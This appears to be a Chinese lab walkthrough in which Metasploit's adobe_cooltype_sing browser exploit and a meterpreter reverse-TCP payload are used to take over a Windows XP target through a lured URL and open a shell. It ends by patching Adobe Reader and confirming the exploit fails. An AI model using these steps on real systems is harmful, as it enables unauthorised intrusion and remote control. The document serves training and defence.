第二步,打开Kali Linux渗透机使用命令msfconsole进入Metasploit渗透测试平台,使用模块adobe_cooltype_sing生成木马文件。
输入search adobe_cooltype_sing命令搜索Adobe渗透模块
与漏洞相关的模块有两个,编号为0的模块是使用本地的服务器挂载木马文件的模块,编号为1的模块是生成木马文件需要用到的模块。
使用use exploit/windows/browser/adobe_cooltype_sing命令调用渗透模块,并查看模块的详情
使用set SRVHOST 172.16.1.100命令,设置渗透机监听的Apache服务地址
使用set payload windows/meterpreter/reverse_tcp命令设置meterpreter载荷
使用set LHOST 172.16.1.100命令设置Kali用于监听本地地址
使用set LPORT 命令设置本地用于监听的端口
使用命令show options查看配置完成的参数
最后使用命令exploit执行模块
得到一个http://172.16.1.100:8080/RlMOOPnOuIvk的URL地址
第三步,打开靶机Windows XP的IE浏览器,使用浏览器访问上面生成的URL
第四步,切换至渗透机中查看效果
此时已获得系统最高权限,使用命令session -i查看当前后台活跃的会话。
使用命令session -i 1切换到编号为1的会话中,并使用命令shell进入靶机命令终端
第五步,回到靶机Windows XP安装最新版的Adobe Reader阅读软件。首先在安装新版本的Adobe Reader软件之前卸载旧版本的软件
选择Remove,然后点Next,接下来直接选Next继续,将Adobe Reader卸载掉
然后安装新的版本,安装文件(Adobe_Reader_11.exe)位于桌面
勾选上自动安装更新(推荐)(A),然后点安装
安装成功后再次访问URL链接
回到渗透机中查看效果
发现木马已经失效,加固成功。
